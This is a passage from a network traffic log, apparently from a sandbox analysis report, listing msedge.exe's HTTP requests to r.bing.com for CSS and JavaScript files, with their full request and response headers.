Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0972f9
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/DXWOtH36Xc9q8xTmhl8XAK5tw_w.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/DXWOtH36Xc9q8xTmhl8XAK5tw_w.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
Purpose: prefetch
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 6808
Content-Type: text/css
Content-Encoding: br
Content-MD5: jQ++3sGypR1dMFw4OoBnbQ==
Last-Modified: Thu, 03 Oct 2024 11:25:49 GMT
ETag: 0x8DCE39E22464029
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: eea6ba97-c01e-0043-77bb-15c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.ba777b5c.1727983693.f44f749
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=265130
Expires: Tue, 08 Oct 2024 17:44:20 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f0972fd
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 323
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: +CLmYDPZ4qSTibcD/NDa/Q==
Last-Modified: Fri, 07 Jun 2024 08:43:53 GMT
ETag: 0x8DC86CDF5F64964
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4f167cbc-a01e-0078-08fb-c2a754000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=101860
Expires: Sun, 06 Oct 2024 20:23:10 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f097dd8
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/KjcQM3UW1nOQMxru5p6M1wKu4ZQ.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/KjcQM3UW1nOQMxru5p6M1wKu4ZQ.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 444
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: rcwNaARzBLLtHGn0ljEM5g==
Last-Modified: Tue, 24 Sep 2024 06:12:41 GMT
ETag: 0x8DCDC5FE5D2EEEE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6c6de606-101e-0027-0ba3-1470d9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=144801
Expires: Mon, 07 Oct 2024 08:18:51 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f0980b4
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/1KnmNqMx2Ms13sCKZ0bZ_VWynP0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/1KnmNqMx2Ms13sCKZ0bZ_VWynP0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 5336
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: F5AMU56DcKjriOLVeuMEEg==
Last-Modified: Tue, 24 Sep 2024 05:41:57 GMT
ETag: 0x8DCDC5B9AAB66F5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3cc01497-f01e-0069-0bc0-15b53c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.4c1a1202.1727984100.b2647cbe
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=266907
Expires: Tue, 08 Oct 2024 18:13:58 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098261
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/eFDN7fKU2A1-FihFOP4WWnERGEw.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/eFDN7fKU2A1-FihFOP4WWnERGEw.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 430
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: rTCSXbL+SXH05fSVWttbkA==
Last-Modified: Thu, 22 Aug 2024 18:57:38 GMT
ETag: 0x8DCC2DC4AAEACB6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 319de170-d01e-0010-2834-14c1c4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=97068
Expires: Sun, 06 Oct 2024 19:03:19 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0983f6
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cVhztCgE3ZjlZ4NrICPGsTh1WbQ.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/cVhztCgE3ZjlZ4NrICPGsTh1WbQ.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 779
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: v3NqJ4fRbgHpdRJm3W2CIQ==
Last-Modified: Tue, 24 Sep 2024 06:41:45 GMT
ETag: 0x8DCDC63F51C34C5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 192f8b83-601e-006c-200b-154143000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=189278
Expires: Mon, 07 Oct 2024 20:40:09 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098590
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/JoohjY70ffsi6uD_M8C9yDukIcc.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/JoohjY70ffsi6uD_M8C9yDukIcc.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1174
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: iPxMs58eYrv7sUu1CuDkTg==
Last-Modified: Fri, 04 Oct 2024 07:28:26 GMT
ETag: 0x8DCE44623056C50
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 541c54fd-901e-005b-7d5c-16edec000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.9e221002.1728053566.138bce45
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=334241
Expires: Wed, 09 Oct 2024 12:56:12 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0986ce
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/Mi_1CQO28mEq97e_dzQbiA3Bgx0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Mi_1CQO28mEq97e_dzQbiA3Bgx0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 200
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Gk5DW+HIyCdDGbieeoXmdg==
Last-Modified: Mon, 13 Feb 2023 19:26:54 GMT
ETag: 0x8DB0DF843F899B8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c1519584-801e-00c6-3034-14cf2d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=97081
Expires: Sun, 06 Oct 2024 19:03:32 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0987cf
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/VtuQ9KZHE8bgpHcyoOX_FX2AI6M.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/VtuQ9KZHE8bgpHcyoOX_FX2AI6M.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 25 Sep 2024 11:24:53 GMT
ETag: 0x8DCDD54AD9FEF91
Akamai-GRN: 0.be777b5c.1728020948.46f20ea
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 164
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: zaEYLlFepkwV4yJhfBQoAQ==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aa56a7c4-401e-004f-4c47-1275f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=16522
Expires: Sat, 05 Oct 2024 20:40:53 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098952
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 308
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: rimZQyGjXssDEnuSlgMaJA==
Last-Modified: Tue, 24 Sep 2024 05:55:43 GMT
ETag: 0x8DCDC5D86C3D99C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8bb7b803-e01e-0054-7e94-15001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=248081
Expires: Tue, 08 Oct 2024 13:00:13 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098a5e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6s/xk/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/xk/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 399
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Fri, 27 Sep 2024 00:20:32 GMT
X-EventID: 66f6e60254d04513a94102c41651b64c
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E030
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-RYHw6ulwoLVIAsUd9eRErtcmlPALLQdY4+bHCMguv1w='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=133278
Expires: Mon, 07 Oct 2024 05:06:50 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098b58
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 626
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 6Xn7G4GYLjqWVjZYfi42LQ==
Last-Modified: Tue, 24 Sep 2024 05:53:26 GMT
ETag: 0x8DCDC5D351B0B64
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c7ca1178-901e-0014-5fd9-1429f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=167689
Expires: Mon, 07 Oct 2024 14:40:21 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098c09
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Nz3080e44w3456W4QiR1L5nz6Tg.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Nz3080e44w3456W4QiR1L5nz6Tg.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 324
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: KixLi5xMliwEIxbNV8RpbA==
Last-Modified: Tue, 24 Sep 2024 06:17:40 GMT
ETag: 0x8DCDC6097D3561C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ba58cfee-c01e-0043-0da7-14c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=146488
Expires: Mon, 07 Oct 2024 08:47:00 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098d1f
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1076
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: oqLg+91b3FmpcS7e8iKMsQ==
Last-Modified: Tue, 24 Sep 2024 06:44:16 GMT
ETag: 0x8DCDC644F5E5FC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: feb22791-e01e-0010-4650-15dc76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=219079
Expires: Tue, 08 Oct 2024 04:56:51 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098e16
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/qwMEjUE0QQWPAgcHgP467OnJ6x0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/qwMEjUE0QQWPAgcHgP467OnJ6x0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 5631
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: DG3NUtPRl/BSx2DovUtfBA==
Last-Modified: Tue, 24 Sep 2024 07:03:25 GMT
ETag: 0x8DCDC66FC5EFBE2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1ae91093-301e-0012-5918-15de8c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
